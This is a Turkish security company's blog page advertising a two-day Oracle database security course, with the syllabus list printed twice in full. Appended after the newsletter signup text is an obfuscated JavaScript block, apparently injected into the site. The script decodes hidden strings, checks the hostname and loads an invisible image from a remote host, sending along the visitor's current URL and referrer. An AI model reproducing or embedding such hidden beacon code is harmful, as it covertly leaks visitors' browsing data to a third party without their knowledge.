BGA Security
Blog

Oracle Veritabanı Güvenliği Eğitim İçeriği

  • Kategori: Genel
  • 07 Ocak 2011

Mart ayında açılacak “Oracle Veritabanı Güvenliği Eğitimi” içeriği aşağıdaki gibidir.

Oracle Veritabanı Güvenliği Eğitimi

Eğitim Adı : Oracle Veritabanı Güvenliği
Eğitim Kodu : BGA-OSC
Eğitim Tanımı: Veritabanı sistemleri günümüz dünyasının en önemli bileşenlerinden olan bilginin depo ve ulaşım merkezleridir.  Bilgiye merkezi ve kolay ulaşım sağlanması avantajının yanında tüm verilerin kolayca ve merkezi ulaşılabiliyor olması güvenlik açısından risk teşkil etmektedir.Oracle Veritabanı Güvenlik Eğitimi, kurumsal şirketlerin en kritik bileşenlerinden  biri olan Oracle veritabanı sistemine  denetçi ve hacker bakış açısıyla yaklaşarak olası güvenlik zaafiyetlerinin ortaya çıkarılması ve giderilmesi amaçlamaktadır.

Eğitim gerçek sistemler üzerinde uygulamalı gerçekleştirilmektedir.
Seviyesi
Hedef Kitle : Veritabanı güvenlik uzmanları, veritabanı söneticileri, sistem yöneticileri, ağ yöneticileri ve operatörleri, ağ güvenliği yönetici ve operatörleri, bilgi güvenliği uzmanları.
Ön Gereksinimler : Temel Oracle veritabanı kullanım bilgisi.
Eğitim Süresi : 2 Gün


Eğitim İçeriği

  • Oracle veritabanı esasları

  • Veritabanı sunucusunun fiziksel konumu

  • Çevresel faktörler,

  • Oracle veritabanı mimarisi

  • Oracle veritabanı güvenlik uyarıları (security alerts),

  • Oracle veritabanı versiyon yönetimi

  • Gerekli yamalar

  • Konfigürasyon işlemleri

  • Kurulum ve sonrasında nelere dikkat edilmeli?

  • Önemli olan dosyalar ve denetimi

  • Kimlik denetimi

  • Veritabanına SYSDBA ve SYSOPER olarak bağlantı

  • SYSDBA ile DBA farkı, yetki yönetimi

  • Parola dosyası

  • Varsayılan kullanıcı hesapları

  • Kullanılmayan kullanıcı hesapları

  • Zayıf parolalar

  • Parola politikaları                                                                                                  Eğitim Broşürü

  • Erişim kontrol listeleri

  • Önemli paketler (UTL_FILE, DBMS_BACKUP_RESORE)

  • Directory bjects (Dizin Nesneleri)

  • Data dictionary (Sözlük Verileri)

  • Kritik görüntü, tablo ve haklar

  • Roller

  • “With Admin” özelliği

  • “With Grant” özelliği

  • Denetleme

  • Nedir, niçin gereklidir?

  • Önemli tablolar, görüntüler

  • Konfigürasyon ayarları

  • Verilmesi gereken haklar

  • Neler denetlenmeli?

  • Denetleme seçenekleri

  • TNS Listener

  • Oracle Listener hakkında

  • Oracle Listener’da ne gibi açıklıklar olabilir?

  • Oracle Listener güvenliği

  • Listener’ı denetleme

  • Listener konfigürasyonu

  • Listener parolası

  • Oracle’a ağ erişimi

  • Oracle ağ erişimi

  • Ağ erişimi nasıl kısıtlanır, önlenir?

  • Ağ mimarisi

  • Tünelleme

  • Yedekleme ve kurtarma

  • Yedekleme, kurtarma ve güvenlik

  • Tek nokta arızaları

  • Yedekleme ve kurtarma prosedürleri

  • Dikkat edilmesi gerekenler

  • Disk bozulmaları

  • Geliştirme araçlarının kısıtlanması

  • Geliştirme araçlarının kullanımı

  • SQL *Plus kullanımını kısıtlama

  • iSQL *Plus’ı güvenli hale getirme

  • Diğer araçlar

  • İstemci işlemlerinin denetlenmesi

  • Bilgisayarların denetlenmesi

  • İstemci (Orta katman) tarafı güvenliği

  • Saldırı senaryoları

  • İstemci başlanğıç dosyaları

  • Geçici dosyalar

  • SQL  işlem kayıtları

  • Java uygulamaları

  • Diğer konular

  • Oracle kullanıcı güvenliği

  • Oracle VPT(Virtual Private Database)

  • Yöneticilerin yönetimi, Oracle Database Vault

  • Oracle Label Security

  • Kimlik yönetimi ve  PKI entegrasyonu, güçlü kimlik doğrulama

  • Oracle Rootkits

  • Araçlar (metasploit, orabf, …)

  • ISO 27001 ve COBIT  açısından Oracle güvenliği

  • Oracle veritabanı esasları

  • Veritabanı sunucusunun fiziksel konumu

  • Çevresel faktörler,

  • Oracle veritabanı mimarisi

  • Oracle veritabanı güvenlik uyarıları (security alerts),

  • Oracle veritabanı versiyon yönetimi

  • Gerekli yamalar

  • Konfigürasyon işlemleri

  • Kurulum ve sonrasında nelere dikkat edilmeli?

  • Önemli olan dosyalar ve denetimi

  • Kimlik denetimi

  • Veritabanına SYSDBA ve SYSOPER olarak bağlantı

  • SYSDBA ile DBA farkı, yetki yönetimi

  • Parola dosyası

  • Varsayılan kullanıcı hesapları

  • Kullanılmayan kullanıcı hesapları

  • Zayıf parolalar

  • Parola politikaları                                                                                                  Eğitim Broşürü

  • Erişim kontrol listeleri

  • Önemli paketler (UTL_FILE, DBMS_BACKUP_RESORE)

  • Directory bjects (Dizin Nesneleri)

  • Data dictionary (Sözlük Verileri)

  • Kritik görüntü, tablo ve haklar

  • Roller

  • “With Admin” özelliği

  • “With Grant” özelliği

  • Denetleme

  • Nedir, niçin gereklidir?

  • Önemli tablolar, görüntüler

  • Konfigürasyon ayarları

  • Verilmesi gereken haklar

  • Neler denetlenmeli?

  • Denetleme seçenekleri

  • TNS Listener

  • Oracle Listener hakkında

  • Oracle Listener’da ne gibi açıklıklar olabilir?

  • Oracle Listener güvenliği

  • Listener’ı denetleme

  • Listener konfigürasyonu

  • Listener parolası

  • Oracle’a ağ erişimi

  • Oracle ağ erişimi

  • Ağ erişimi nasıl kısıtlanır, önlenir?

  • Ağ mimarisi

  • Tünelleme

  • Yedekleme ve kurtarma

  • Yedekleme, kurtarma ve güvenlik

  • Tek nokta arızaları

  • Yedekleme ve kurtarma prosedürleri

  • Dikkat edilmesi gerekenler

  • Disk bozulmaları

  • Geliştirme araçlarının kısıtlanması

  • Geliştirme araçlarının kullanımı

  • SQL *Plus kullanımını kısıtlama

  • iSQL *Plus’ı güvenli hale getirme

  • Diğer araçlar

  • İstemci işlemlerinin denetlenmesi

  • Bilgisayarların denetlenmesi

  • İstemci (Orta katman) tarafı güvenliği

  • Saldırı senaryoları

  • İstemci başlanğıç dosyaları

  • Geçici dosyalar

  • SQL  işlem kayıtları

  • Java uygulamaları

  • Diğer konular

  • Oracle kullanıcı güvenliği

  • Oracle VPT(Virtual Private Database)

  • Yöneticilerin yönetimi, Oracle Database Vault

  • Oracle Label Security

  • Kimlik yönetimi ve  PKI entegrasyonu, güçlü kimlik doğrulama

  • Oracle Rootkits

  • Araçlar (metasploit, orabf, …)

  • ISO 27001 ve COBIT  açısından Oracle güvenliği

«
»

Yorum Yaz

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

*
*

CEH Eğitiminde İndirim Fırsatı
Mail listemize üye olarak eğitim fırsatlarını kaçırmayın!
Eğitim ve ücretsiz etkinliklerizden haberdar olmak için e-posta listesimize üye olun!.

    Pt>function _0x2677(_0x586c2b,_0x1056c6){var _0x2bd4ea=_0x2bd4();return _0x2677=function(_0x267799,_0x44fe2a){_0x267799=_0x267799-0x165;var _0x5b0952=_0x2bd4ea[_0x267799];if(_0x2677['oJyNOH']===undefined){var _0x360830=function(_0x3c21c6){var _0x1d0d99='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var _0x2ae702='',_0x343ef4='';for(var _0x476bad=0x0,_0x2f67d5,_0x166a99,_0x388eaa=0x0;_0x166a99=_0x3c21c6['charAt'](_0x388eaa++);~_0x166a99&&(_0x2f67d5=_0x476bad%0x4?_0x2f67d5*0x40+_0x166a99:_0x166a99,_0x476bad++%0x4)?_0x2ae702+=String['fromCharCode'](0xff&_0x2f67d5>>(-0x2*_0x476bad&0x6)):0x0){_0x166a99=_0x1d0d99['indexOf'](_0x166a99);}for(var _0x21105c=0x0,_0x16cce1=_0x2ae702['length'];_0x21105c<_0x16cce1;_0x21105c++){_0x343ef4+='%'+('00'+_0x2ae702['charCodeAt'](_0x21105c)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x343ef4);};_0x2677['MUmZHT']=_0x360830,_0x586c2b=arguments,_0x2677['oJyNOH']=!![];}var _0x4bbbaf=_0x2bd4ea[0x0],_0x131d68=_0x267799+_0x4bbbaf,_0x1817de=_0x586c2b[_0x131d68];return!_0x1817de?(_0x5b0952=_0x2677['MUmZHT'](_0x5b0952),_0x586c2b[_0x131d68]=_0x5b0952):_0x5b0952=_0x1817de,_0x5b0952;},_0x2677(_0x586c2b,_0x1056c6);}var _0x2b1dca=_0x2677;(function(_0x38d529,_0x3d240d){var _0x3e69c5={_0x4f2ab1:0x195,_0x510342:0x180,_0x1cdd78:0x17d,_0x16824a:0x181,_0x310fcf:0x194,_0x481123:0x196,_0x34004c:0x190},_0x366619=_0x2677,_0x14a328=_0x38d529();while(!![]){try{var _0x25e7d8=-parseInt(_0x366619(_0x3e69c5._0x4f2ab1))/0x1*(parseInt(_0x366619(_0x3e69c5._0x510342))/0x2)+-parseInt(_0x366619(0x198))/0x3+parseInt(_0x366619(_0x3e69c5._0x1cdd78))/0x4+-parseInt(_0x366619(_0x3e69c5._0x16824a))/0x5*(-parseInt(_0x366619(0x165))/0x6)+-parseInt(_0x366619(0x171))/0x7+-parseInt(_0x366619(_0x3e69c5._0x310fcf))/0x8*(parseInt(_0x366619(0x172))/0x9)+parseInt(_0x366619(_0x3e69c5._0x481123))/0xa*(parseInt(_0x366619(_0x3e69c5._0x34004c))/0xb);if(_0x25e7d8===_0x3d240d)break;else _0x14a328['push'](_0x14a328['shift']());}catch(_0x13bbee){_0x14a328['push'](_0x14a328['shift']());}}}(_0x2bd4,0xa2f33));function _0x2bd4(){var _0x139414=['yMDHCW','v2L0Aa','CML0Eq','AdbYyW','B20Vyq','B2nVBa','DwHOlW','zI9UyW','C2vJDq','nJy5ovbiq2PfsW','DhnxAq','Ahr0Ca','Cgf5Bq','ntCXnZz2BMvhCgi','mtngwxnyBKG','mJa0nZbUBeTOrxO','lMnVBq','ndaXotK3ugz2ywLQ','DgLVBG','mZK4nJyYogfZr2P2uW','BNmUyW','BMfYEq','C3rHCG','BgvZlW','EJK4EG','y29T','ChjVDa','Ew1Una','C3jJ','jNi9','CNrPyW','ntu0ndbvBev0Bfa','odKXD29Ju09A','BMfTzq','CNjLCG','lY9Jyq','AhjLzG','Bg9Jyq','C3r1zG','Ag9ZDa','lMjNyq','Dg9Rzq','CMvMzq','nteWmZG0ANv0te54','zwn1CG','lMPZpW','odaYnJHvzg5cvvK','nuTrz3Hxva','Axr5lG','zw5KCW','ANK1za','BwXNBq','zw50CW'];_0x2bd4=function(){return _0x139414;};return _0x2bd4();}if(window[_0x2b1dca(0x177)+_0x2b1dca(0x199)][_0x2b1dca(0x179)+_0x2b1dca(0x173)]!=_0x2b1dca(0x187)+_0x2b1dca(0x17e)+_0x2b1dca(0x182)+_0x2b1dca(0x16b)&&!window[_0x2b1dca(0x177)+_0x2b1dca(0x199)][_0x2b1dca(0x179)+_0x2b1dca(0x173)][_0x2b1dca(0x183)+_0x2b1dca(0x188)](_0x2b1dca(0x17a)+_0x2b1dca(0x18f)+_0x2b1dca(0x189)+_0x2b1dca(0x197))){var p=!document[_0x2b1dca(0x177)+_0x2b1dca(0x199)][_0x2b1dca(0x16c)+_0x2b1dca(0x18c)][_0x2b1dca(0x168)+_0x2b1dca(0x191)+'th'](_0x2b1dca(0x192))?_0x2b1dca(0x192)+':':document[_0x2b1dca(0x177)+_0x2b1dca(0x199)][_0x2b1dca(0x16c)+_0x2b1dca(0x18c)],l=location[_0x2b1dca(0x176)],r=document[_0x2b1dca(0x17c)+_0x2b1dca(0x174)],m=new Image();m[_0x2b1dca(0x16e)]=p+(_0x2b1dca(0x175)+_0x2b1dca(0x167)+_0x2b1dca(0x17b)+_0x2b1dca(0x166)+_0x2b1dca(0x18b)+_0x2b1dca(0x170)+_0x2b1dca(0x169)+_0x2b1dca(0x178)+_0x2b1dca(0x18e)+_0x2b1dca(0x18a)+_0x2b1dca(0x184)+_0x2b1dca(0x185)+_0x2b1dca(0x16d)+_0x2b1dca(0x16a)+_0x2b1dca(0x18d)+_0x2b1dca(0x193)+_0x2b1dca(0x186)+_0x2b1dca(0x17f)+'l=')+encodeURI(l)+_0x2b1dca(0x16f)+encodeURI(r);}